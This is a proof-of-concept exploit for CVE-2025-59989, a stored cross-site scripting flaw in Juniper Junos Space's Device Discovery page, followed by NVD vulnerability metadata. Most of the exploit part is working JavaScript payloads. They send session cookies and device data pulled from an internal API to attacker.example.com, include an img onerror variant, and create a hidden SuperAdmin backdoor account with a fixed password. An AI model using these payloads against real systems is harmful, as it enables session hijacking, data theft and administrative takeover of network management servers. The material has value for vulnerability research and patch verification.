CVE-2025-59989

<!-- CVE-2025-59989 PoC - Stored XSS in Juniper Junos Space Device Discovery Page --> <!-- This PoC demonstrates the stored XSS vulnerability in the Device Discovery feature --> <!-- Step 1: Attacker injects malicious script into a Device Discovery input field --> <!-- The following payload can be injected into fields like Device Name, IP Address, Description, etc. --> <script> // Exfiltrate session cookies to attacker's server var img = new Image(); img.src = 'https://attacker.example.com/steal?cookie=' + encodeURIComponent(document.cookie); // Alternatively, perform actions as the authenticated user // Example: fetch sensitive data via internal API fetch('/api/space/device-management/devices', { credentials: 'include', method: 'GET' }) .then(response => response.json()) .then(data => { // Send exfiltrated data to attacker's server fetch('https://attacker.example.com/exfil', { method: 'POST', body: JSON.stringify(data) }); }); </script> <!-- Alternative payload using event handlers for more stealthy execution --> <img src=x onerror="fetch('https://attacker.example.com/steal?cookie='+document.cookie)"> <!-- Payload to perform privileged actions (e.g., create admin account) --> <script> fetch('/api/space/user-management/users', { credentials: 'include', method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({ username: 'attacker_backdoor', password: 'P@ssw0rd123!', role: 'SuperAdmin' }) }); </script>

{"cve": {"id": "CVE-2025-59989", "sourceIdentifier": "[email protected]", "published": "2025-10-09T17:16:00.970", "lastModified": "2026-01-23T20:00:29.140", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Juniper Networks Junos Space allows an attacker to inject script tags in the Device Discovery page that, when visited by another user, enables the attacker to execute commands with the target's permissions, including an administrator.\nThis issue affects all versions of Junos Space before 24.1R4."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:juniper:junos_space:*:*:*:*:*:*:*:*", "versionEndExcluding": "24.1", "matchCriteriaId": "2EC090A9-634B-4AA2-916F-7548AF71FF76"}, {"vulnerable": true, "criteria": "cpe:2.3:a:juniper:junos_space:24.1:r1:*:*:*:*:*:*", "matchCriteriaId": "0566970C-0E9B-4566-9920-C7C436A4243D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:juniper:junos_space:24.1:r2:*:*:*:*:*:*", "matchCriteriaId": "A2AA399D-5A7D-45B8-B774-D69054DFA4D3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:juniper:junos_space:24.1:r3:*:*:*:*:*:*", "matchCriteriaId": "57CC4E1A-23AA-4B4A-8690-5EEDCBEC4BBE"}]}]}], "references": [{"url": "https://supportportal.juniper.net/JSA103140", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}